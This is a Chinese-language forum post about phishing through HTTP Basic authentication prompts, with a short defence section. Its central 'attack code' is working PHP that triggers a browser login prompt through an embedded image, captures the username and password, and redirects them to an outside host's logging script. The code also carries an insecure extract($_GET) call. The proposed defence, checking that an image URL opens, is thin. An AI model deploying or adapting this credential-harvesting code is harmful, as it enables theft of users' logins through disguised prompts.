设为首页收藏本站

追梦网络设备与服务论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

快捷导航
搜索
查看: 783|回复: 0

基础认证钓鱼攻击与防范

[复制链接]
  • TA的每日心情
    郁闷
    2018-9-4 09:03
  • 签到天数: 304 天

    [LV.8]以坛为家I

    888

    主题

    1428

    帖子

    1万

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    16483

    最佳新人活跃会员热心会员推广达人荣誉管理

    发表于 2015-2-25 15:24:50 | 显示全部楼层 |阅读模式
    ???????? ?? ?? 360 ?? ?? ?? ?? ?? ?? ??

    首先大家回想一下,在访问路由器的时候是不是会弹出这样的一个弹窗让你输入帐号密码登录呢?没错,这就是最近很火的基础认证。那我们如何用php来实现钓鱼攻击呢?

    在php手册中有以下代码来演示基础认证登录。

    if (!isset($_SERVER['PHP_AUTH_USER'])) {

    header('WWW-Authenticate: Basic realm="My Realm"');

    header('HTTP/1.0 401 Unauthorized');

    echo 'Text to send if user hits Cancel button';

    exit;

    } else {

    echo "<p>Hello {$_SERVER['PHP_AUTH_USER']}.</p>";

    echo "<p>You entered {$_SERVER['PHP_AUTH_PW']} as your password.</p>";

    }

    首先定义HTTP头为WWW-Authenticate,然后相应为401 这样就可以构造一个简单的基础认证框。

    基本流程,用户访问被污染服务器,服务器返回信息,浏览器访问图片地址,图片服务器返回401响应,http头为WWW-Authenticate .....  ,浏览器弹出基础认证框, 由于Location:被定义为收信地址所以,浏览器跳转并转递信息至收信地址。 攻击完成。

    贴出攻击代码吧。

    <?php

    $info=@$_GET['info'];

    if(!isset($_SERVER['PHP_AUTH_USER'])){

    header("WWW-Authenticate:BASIC Realm=$info");

    header("HTTP/1.0 401 Unauthorized");

    exit;

    }else{

    /*获取用户名,密码进行验证*/

    $user=$_SERVER['PHP_AUTH_USER'];

    $pwd=$_SERVER['PHP_AUTH_PW'];

    extract($_GET,EXTR_SKIP);

    if($user&&$pwd){

    header("Location:http://www.baidu.com/config/log.php?user=$user&pass=$pwd");

    }else{

    header("WWW-Authenticate:BASIC Realm=user");

    header("HTTP/1.0 401 Unauthorized");

    exit;

    }

    }

    ?>

    防范措施:

    由于这种攻击并不是由漏洞造成的所以我们的防范手法只能去确定图片地址是否为有效图片。

    我们可以用以下代码来验证图片是否有效!

    <?php

    $url = 'http:// www.2cto.com /img/baidu_sylogo1.gif';

    if( @fopen( $url, 'r' ) )

    {

    echo 'File Exits';

    }

    else

    {

    echo 'File Do Not Exits';

    }

    ?>

    网络服务bbs.chinavlan.cn

    电脑知识www.chinavlan.cn



    追梦网络设备与服务论坛bbs.chinavlan.cn
    月兔网络https://www.chinavlan.cn
    回复 ???????? ?? ?? 360 ?? ?? ?? ?? ?? ?? ??

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    手机版|小黑屋|追梦网络设备与服务论坛_路由器_交换机_Linux_windows server 2003_windows server 2008 ( 蜀ICP备14012146号-1  

    GMT+8, 2019-8-26 15:20 , Processed in 0.130575 second(s), 34 queries .

    X3.2

    快速回复 返回顶部 返回列表